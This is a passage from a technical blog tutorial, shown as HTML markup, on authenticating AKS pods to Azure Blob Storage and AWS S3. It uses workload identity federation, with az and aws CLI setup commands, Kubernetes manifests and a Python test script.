  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 2.1, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/client-id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_CLIENT_ID"&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-azure-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sh'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;-c'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;pip&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;install&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;--no-cache-dir&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;azure-identity&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;azure-storage-blob&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;/app/test_azure_from_aks.py'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_STORAGE_ACCOUNT"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-aks&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_azure_from_aks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_azure_from_aks.py
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.identity&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DefaultAzureCredential&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.storage.blob&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BlobServiceClient&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test Azure Blob Storage access using native AKS Workload Identity&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# DefaultAzureCredential automatically detects workload identity
&lt;/span&gt;        &lt;span class="n"&gt;credential&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DefaultAzureCredential&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_account&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;account_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;storage_account&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;.blob.core.windows.net&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

        &lt;span class="n"&gt;blob_service_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BlobServiceClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;credential&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credential&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List containers (remove max_results parameter)
&lt;/span&gt;        &lt;span class="n"&gt;containers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blob_service_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_containers&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ Azure Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; containers:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;container&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;  &lt;span class="c1"&gt;# Limit display to first 5
&lt;/span&gt;            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;container&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ Azure Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pods &lt;code&gt;kubectl logs -f -n default aks-azure-test&lt;/code&gt;, it means the AKS to Azure Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Azure Authentication successful!
Found 1 containers:
  - test-container
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  2.2 Authenticating to AWS from AKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cross-Cloud Authentication Flow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq7ebxymwqiuvfh7hqa6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq7ebxymwqiuvfh7hqa6.png" alt="aks to aws" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get AKS OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Remove https:// prefix for IAM&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create OIDC provider in AWS&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;&lt;span class="nb"&gt;set &lt;/span&gt;to aws profile where you want to create this oidc provider &lt;span class="k"&gt;in &lt;/span&gt;aws&amp;gt;

&lt;span class="c"&gt;# Extract just the hostname from OIDC_ISSUER&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|https://||'&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|/.*||'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Get the thumbprint&lt;/span&gt;
&lt;span class="nv"&gt;THUMBPRINT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; | openssl s_client &lt;span class="nt"&gt;-servername&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_HOST&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_HOST&lt;/span&gt;:443 &lt;span class="nt"&gt;-showcerts&lt;/span&gt; 2&amp;gt;/dev/null &lt;span class="se"&gt;\&lt;/span&gt;
  | openssl x509 &lt;span class="nt"&gt;-fingerprint&lt;/span&gt; &lt;span class="nt"&gt;-sha1&lt;/span&gt; &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s/SHA1 Fingerprint=//;s/://g'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Create the OIDC provider&lt;/span&gt;
aws iam create-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--url&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--client-id-list&lt;/span&gt; sts.amazonaws.com &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--thumbprint-list&lt;/span&gt; &lt;span class="nv"&gt;$THUMBPRINT&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create trust policy&lt;/span&gt;
&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .Account&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; aks-aws-trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:sub": "system:serviceaccount:default:aks-cross-cloud-sa",
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# 4. Create IAM role&lt;/span&gt;
aws iam create-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://aks-aws-trust-policy.json

&lt;span class="c"&gt;# 5. Attach permissions&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 2.2, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario2-2-aks-to-aws.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-aws-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# aks-cross-cloud-sa SA is created scenario 2.1&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test&lt;/span&gt;
      &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
      &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sh'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;-c'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;pip&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;install&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;boto3&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;/app/test_aws_from_aks.py'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_ROLE_ARN&lt;/span&gt;
          &lt;span class="c1"&gt;# replace YOUR_AWS_ACCOUNT_ID with aws account number where you create the IAM Role&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/aks-to-aws-role"&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/aws/tokens/aws-token&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_REGION&lt;/span&gt;
